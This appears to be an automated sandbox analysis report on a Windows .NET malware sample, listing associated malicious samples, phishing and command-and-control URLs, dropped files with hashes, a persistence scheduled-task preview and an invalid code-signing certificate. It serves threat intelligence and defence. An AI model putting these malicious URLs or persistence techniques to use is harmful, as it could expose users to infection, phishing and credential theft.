	PURCHASING ORDER.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.wergol.com/hy08/?q4k=76ARE7XQpOejeJ4AXgyv9+sF91x02cjLA3TRMrZhHEY9TEByi8vF89DJ/cA73183I0kqTGhIwQ==&3f2pj=9rDXMfLppP84JvX
	Local items and pay document.exe	Get hash	malicious	FormBook	Browse	www.valerieomage.com/c7rq/?HpUtEh=httm3UUwH6NnwSQhbzeVca8kqE5bj6YPstl+OFvVeu4EU857dyc7w4+qhgXRMO7PTzi/X2HMMMtdNC+wv2+smIEknaszCFizMu+VfqPjgOzMiH+CUg==&G2A=JHe0kn
103.235.47.188	f2.exe	Get hash	malicious	BlackMoon	Browse	www.baidu.com/
	f1.exe	Get hash	malicious	Unknown	Browse	www.baidu.com/
	SecuriteInfo.com.FileRepMalware.29184.31872.exe	Get hash	malicious	Unknown	Browse	www.baidu.com/
	chAJcIK6ZO.exe	Get hash	malicious	Unknown	Browse	www.baidu.com/
	LisectAVT_2403002A_489.exe	Get hash	malicious	Unknown	Browse	www.baidu.com/
	d48c236503a4d2e54e23d9ebc9aa48e86300fd24955c871a7b8792656c47fb6a.exe	Get hash	malicious	Bdaejec	Browse	www.baidu.com/
	7Y18r(100).exe	Get hash	malicious	Unknown	Browse	www.baidu.com/
	7Y18r(100).exe	Get hash	malicious	Unknown	Browse	www.baidu.com/
	Yiwaiwai Build Version.exe	Get hash	malicious	Unknown	Browse	www.baidu.com/
	Yiwaiwai Build Version.exe	Get hash	malicious	Unknown	Browse	www.baidu.com/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
www.wshifen.com	f2.exe	Get hash	malicious	BlackMoon	Browse	103.235.46.96
	f1.exe	Get hash	malicious	Unknown	Browse	103.235.47.188
	http://broad.qiaoleix.workers.dev/	Get hash	malicious	Unknown	Browse	103.235.46.96
	http://oveman-austral.com/	Get hash	malicious	Unknown	Browse	103.235.46.96
	SecuriteInfo.com.FileRepMalware.29184.31872.exe	Get hash	malicious	Unknown	Browse	103.235.47.188
	SecuriteInfo.com.FileRepMalware.29184.31872.exe	Get hash	malicious	Unknown	Browse	103.235.46.96
	http://cognitoforms.com/Renato4/ManagementHasAddedYouToAWholeTeam	Get hash	malicious	HTMLPhisher	Browse	103.235.46.96
	7Y18r(213).exe	Get hash	malicious	Nitol	Browse	103.235.47.188
	chAJcIK6ZO.exe	Get hash	malicious	Unknown	Browse	103.235.46.96
	chAJcIK6ZO.exe	Get hash	malicious	Unknown	Browse	103.235.47.188
www.kapalwin.live	4azjP1pzssf79mP.exe	Get hash	malicious	FormBook	Browse	104.21.2.148
shops.myshopify.com	bSecDbrnMO4yqnP.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	23.227.38.74
	Dekont.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	23.227.38.74
	MCS61094Y5OI8.exe	Get hash	malicious	FormBook	Browse	23.227.38.74
	https://www.seattlecoffeegear.com/83175735603/invoices/6a4c36fd259f82bfda53845d55e67b9d	Get hash	malicious	Unknown	Browse	23.227.38.74
	JTM300724IU.vbe	Get hash	malicious	FormBook	Browse	23.227.38.74
	LisectAVT_2403002B_448.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	23.227.38.74
	NUEVO ORDEN01_202407238454854.pdf.exe	Get hash	malicious	FormBook	Browse	23.227.38.74
	4azjP1pzssf79mP.exe	Get hash	malicious	FormBook	Browse	23.227.38.74
	xU0wdBC6XWRZ6UY.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	23.227.38.74
	FSW510972H6P0.exe	Get hash	malicious	FormBook, DBatLoader	Browse	23.227.38.74

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
BAIDUBeijingBaiduNetcomScienceandTechnologyCoLtd	f2.exe	Get hash	malicious	BlackMoon	Browse	103.235.47.188
	f1.exe	Get hash	malicious	Unknown	Browse	103.235.46.96
	http://broad.qiaoleix.workers.dev/	Get hash	malicious	Unknown	Browse	103.235.46.96
	#U5b89#U88c5#U5bdf#U770b.msi	Get hash	malicious	GhostRat	Browse	103.235.47.238
	http://oveman-austral.com/	Get hash	malicious	Unknown	Browse	103.235.46.96
	SecuriteInfo.com.FileRepMalware.29184.31872.exe	Get hash	malicious	Unknown	Browse	103.235.47.188
	SecuriteInfo.com.FileRepMalware.29184.31872.exe	Get hash	malicious	Unknown	Browse	103.235.46.96
	http://cognitoforms.com/Renato4/ManagementHasAddedYouToAWholeTeam	Get hash	malicious	HTMLPhisher	Browse	103.235.46.96
	7Y18r(213).exe	Get hash	malicious	Nitol	Browse	103.235.47.188
	chAJcIK6ZO.exe	Get hash	malicious	Unknown	Browse	103.235.46.96
OVHFR	XagOs5aVxk.exe	Get hash	malicious	RedLine, XWorm	Browse	51.89.201.41
	https://berobv.nl/	Get hash	malicious	Unknown	Browse	5.196.111.72
	https://ff-rewards-redeem-codes-org.github.io/Free-Fire-/	Get hash	malicious	HTMLPhisher	Browse	54.38.113.7
	b720EelfbG.exe	Get hash	malicious	PureLog Stealer, RedLine, zgRAT	Browse	51.89.201.41
	KTx9b1TG5p.exe	Get hash	malicious	RedLine	Browse	51.89.201.41
	RlN9LL3e2r.exe	Get hash	malicious	Quasar	Browse	51.222.21.20
	3.bin.exe	Get hash	malicious	Go Injector	Browse	149.56.19.201
	nblbw9JYDM.elf	Get hash	malicious	Mirai	Browse	91.121.15.199
	https://110b598.wcomhost.com/am/paiement.php	Get hash	malicious	Unknown	Browse	91.134.109.31
	xd.x86.elf	Get hash	malicious	Mirai	Browse	149.60.92.110
CLOUDFLARENETUS	SOF Documents PDF.exe	Get hash	malicious	MassLogger RAT, Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	DHL-66445735750-DHL-66445735750-DHL-66445735750.js	Get hash	malicious	Remcos	Browse	172.66.43.27
	INV_35689.vbe	Get hash	malicious	AveMaria, UACMe	Browse	104.26.1.100
	EG240711 EG240712.xls	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	https://managemyreff.top	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	vdCC5gzAn6.exe	Get hash	malicious	LummaC	Browse	172.67.175.230
	BLXn1MpVdg.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	https://u20321984.ct.sendgrid.net/ls/click?upn=u001.fMSdnDPwyZg8aQYrku4rkJbSTdbYAv-2FauBRdThCsGOmXIaK-2BLk8Ua513S-2BMu-2FBmhCk9NWdfbVaqs3xDSzufJANaLHYH0uxFPDAE5cm8b2MlspXZHjiOm-2BKpu-2Fy9Hy3KZMEwgj5ZdXsk9DhPWgXhivQ-3D-3Dh6E3_hDqK5-2FqkMaHofB46cg26-2FG2ADrhn0F-2Bv1o9g2b6m-2BukLOFGOYA6HwkTzfLZJtXWW64KPOJ7PhKrOCr7UXQRzJDDstp2Y83XLNk05736tBLXvsIM5GvaNogGaU0hS-2F5G5rfaLvaI3rVLwHqyhg9tac-2ByfNiZC4dRRCWsal-2F8dFl1y3vxYorbjyfaqAl0HIwmCygEhZ3SsjdBRdopw56Rz-2FQ-3D-3D	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	https://hU6Od.eschithym.com/a3LMa/#Mmarla.guillaume@nationalmi.com	Get hash	malicious	HTMLPhisher	Browse	188.114.96.3
	https://u20321984.ct.sendgrid.net/ls/click?upn=u001.fMSdnDPwyZg8aQYrku4rkJbSTdbYAv-2FauBRdThCsGOmXIaK-2BLk8Ua513S-2BMu-2FBmhCk9NWdfbVaqs3xDSzufJANaLHYH0uxFPDAE5cm8b2MlspXZHjiOm-2BKpu-2Fy9Hy3KZMEwgj5ZdXsk9DhPWgXhivQ-3D-3Dh6E3_hDqK5-2FqkMaHofB46cg26-2FG2ADrhn0F-2Bv1o9g2b6m-2BukLOFGOYA6HwkTzfLZJtXWW64KPOJ7PhKrOCr7UXQRzJDDstp2Y83XLNk05736tBLXvsIM5GvaNogGaU0hS-2F5G5rfaLvaI3rVLwHqyhg9tac-2ByfNiZC4dRRCWsal-2F8dFl1y3vxYorbjyfaqAl0HIwmCygEhZ3SsjdBRdopw56Rz-2FQ-3D-3D	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14

Process:	C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	true
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\dacYzRiJuWECy.exe.log

Download File

Process:	C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	2232
Entropy (8bit):	5.379540626579189
Encrypted:	false
SSDEEP:	48:BWSU4y4RFymFoUeW+gZ9tK8NPZHUxL7u1iMugei/ZPUyus:BLHyIFvKLgZ2KRHWLOugss
MD5:	919CC88118F7F989747DD5AF6663690B
SHA1:	978C98772E91730924A54A7EEDD8D60ED00E9D99
SHA-256:	54277627205D9D3D72AD2C23BC1AC6D9EAB02E7A8BBD0B4A5A12286AA5D24966
SHA-512:	109A7D92C808DBA3B9D6C504ED2E0770DEA9B4D9F532D159CD4920C1B422128A6ADC34732EA209A5FCD84E06609E9BCDA26889E941A86735C179182E1DE5588D
Malicious:	false
Preview:	@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices<...............i..VdqF...\|...........System.Configuration4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3x000ooz.nxk.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cgylplwg.zz2.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fgmhkcww.aa2.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ircswx3g.zgm.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_itqqbifv.wpa.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jv2lgo0n.2w4.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ocvbi5n5.ohl.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pbppsakb.qy2.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\tmp4BD3.tmp

Download File

Process:	C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1586
Entropy (8bit):	5.113044388266568
Encrypted:	false
SSDEEP:	24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNt0Ixvn:cgergYrFdOFzOzN33ODOiDdKrsuT0ov
MD5:	E4A4922D8FB03EFF1C796843E1105D5A
SHA1:	4F027DD8F5AB346F1A19885CFC5AA5D01746284B
SHA-256:	35C1B225F3E6F22167A10B3A938ABC3ACBD7DF106654A8E111A7FA1EDBAE013F
SHA-512:	A80AC057FD9256BDC52D28A82011FCF85DCE24EDC13DBC0257099615F954F6E5437E0DA926E232789503D2B937E0F5537AF80E24AA4690A64F95D11BC6BC096D
Malicious:	true
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor

C:\Users\user\AppData\Local\Temp\tmp620B.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1586
Entropy (8bit):	5.113044388266568
Encrypted:	false
SSDEEP:	24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNt0Ixvn:cgergYrFdOFzOzN33ODOiDdKrsuT0ov
MD5:	E4A4922D8FB03EFF1C796843E1105D5A
SHA1:	4F027DD8F5AB346F1A19885CFC5AA5D01746284B
SHA-256:	35C1B225F3E6F22167A10B3A938ABC3ACBD7DF106654A8E111A7FA1EDBAE013F
SHA-512:	A80AC057FD9256BDC52D28A82011FCF85DCE24EDC13DBC0257099615F954F6E5437E0DA926E232789503D2B937E0F5537AF80E24AA4690A64F95D11BC6BC096D
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor

C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe

Download File

Process:	C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	668680
Entropy (8bit):	7.943325020463122
Encrypted:	false
SSDEEP:	12288:3Zxa/zmcDXmyLO609WOgt3MbOSJ6gAFss9ewhMBdULG503vdPlLVBkR:3ZxaakZb0wr3MRJ7U9ZMBYG503DLVc
MD5:	4F9709AA08FB342403B4A9D952419184
SHA1:	07913A57CFE7E1674525397F571AE98D3195A11C
SHA-256:	1B9E77854E399411406C1F8E3FA6E0BCEB4A1284C7BEDEED503BCB24BDCFBE30
SHA-512:	CDE7FE3DB0EE4FD1876E3B40601E4D9C81AE4B2FA525335D183C9D0314FDE6EAAA5820303D3FD2EB0A008F09511C08967FE0BA00FEA83C9DEE8D98D80F513FE0
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 21%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....T.f..............0......H......~.... ........@.. .......................`............@.................................,...O........D...............6...@....................................................... ............... ..H............text........ ...................... ..`.rsrc....D.......F..................@..@.reloc.......@......................@..B................`.......H........v...V......`....................................................0..)........{.........(....t......\|......(...+...3.....0..)........{.........(....t......\|......(...+...3.....0..M........(........(......r...p(.....r!..p...(........(....}.......(....}.......%.}.....}.....(........9.......(............L...%..,.o...........( ...}.........( ...}.........( ...}.........(!...}.........(!...}.........("...}.........(#...}.........(#...}......:...r7..p($.......}......#.....

C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.943325020463122
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 50.01% Win32 Executable (generic) a (10002005/4) 49.96% Win16/32 Executable Delphi generic (2074/23) 0.01% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	CZyOWoN2hiszA6d.exe
File size:	668'680 bytes
MD5:	4f9709aa08fb342403b4a9d952419184
SHA1:	07913a57cfe7e1674525397f571ae98d3195a11c
SHA256:	1b9e77854e399411406c1f8e3fa6e0bceb4a1284c7bedeed503bcb24bdcfbe30
SHA512:	cde7fe3db0ee4fd1876e3b40601e4d9c81ae4b2fa525335d183c9d0314fde6eaaa5820303d3fd2eb0a008f09511c08967fe0ba00fea83c9dee8d98d80f513fe0
SSDEEP:	12288:3Zxa/zmcDXmyLO609WOgt3MbOSJ6gAFss9ewhMBdULG503vdPlLVBkR:3ZxaakZb0wr3MRJ7U9ZMBYG503DLVc
TLSH:	DCE4222177F81B41E9BD1FF51268551287B0BB736827F38C1CC591EC28A6FE08A6235B
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....T.f..............0......H......~.... ........@.. .......................`............@................................

File Icon


Icon Hash:	3f4f5b8947716d33

Static PE Info

General

Entrypoint:	0x49d37e
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x66B054B7 [Mon Aug 5 04:27:35 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	13/11/2018 01:00:00 09/11/2021 00:59:59
Subject Chain	CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
Version:	3
Thumbprint MD5:	DABD77E44EF6B3BB91740FA46696B779
Thumbprint SHA-1:	5B9E273CF11941FD8C6BE3F038C4797BBE884268
Thumbprint SHA-256:	4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
